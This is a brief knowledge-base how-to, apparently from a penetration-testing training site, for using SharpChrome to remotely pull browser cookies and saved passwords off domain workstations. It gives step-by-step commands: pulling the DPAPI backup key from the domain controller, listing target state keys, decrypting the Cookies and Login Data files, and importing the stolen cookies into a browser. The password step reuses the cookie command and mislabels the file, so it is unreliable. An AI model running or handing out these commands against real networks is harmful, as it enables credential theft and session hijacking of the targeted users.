Antisyphon KB

SharpChrome

Nov 04, 20242 min read

Remotely retrieve cookies from another computer

1. Retrieve the DPAPI backup key from the DC.

This command must be run as a Domain Admin or other privileged domain account:

sharpchrome backupkey /nowrap /server:<DOMAIN CONTROLLER>

2. List statekeys/user profile UNC paths on the target host.

  • Replace <BACKUP KEY> with the Base64 key data you received from the previous command.
  • Replace <WORKSTATION ADDRESS> with the address/hostname of the workstation you are targeting.
sharpchrome statekeys /pvk:<BACKUP KEY> /server:<WORKSTATION ADDRESS>

3. Retrieve cookies from a target user.

Select a state key & UNC path pair from the previous command output.

Replace Local State in the UNC path with Network\Cookies.

  • This is the location of the SQLite database where the user’s browser cookies are stored.
  • Example:
    • \\workstation.acme.com\C$\Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default\Local State
    • Becomes: \\workstation.acme.com\C$\Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Fill in the blanks in the command below:

  • <WORKSTATION ADDRESS> - The workstation you want to retrieve cookies from.
  • <STATE KEY> - The target state key output by the previous command.
  • <UNC PATH> - The UNC path to the Cookies file (explained in the previous step).
sharpchrome cookies /pvk:<BACKUP KEY> /server:<WORKSTATION ADDRESS> /format:json /statekey:<STATE KEY> /target:<UNC PATH>

Run the command to receive cookies.

  • JSON-formatted cookies can be imported into your browser with the Cookiebro add-on.

4. Retrieve saved passwords from a target user.

Select a target state key & UNC path pair.

Replace Local State in the UNC path with Login Data.

  • This is the location of the SQLite database where the user’s browser cookies are stored.
  • Example:
    • \\workstation.acme.com\C$\Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default\Local State
    • Becomes: \\workstation.acme.com\C$\Users\jsmith\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Fill in the blanks in the command below:

  • <WORKSTATION ADDRESS> - The workstation you want to retrieve cookies from.
  • <STATE KEY> - The target state key output by the previous command.
  • <UNC PATH> - The UNC path to the Login Data file (explained in the previous step).
sharpchrome cookies /pvk:<BACKUP KEY> /server:<WORKSTATION ADDRESS> /statekey:<STATE KEY> /target:<UNC PATH>

Graph View

Backlinks

  • No backlinks found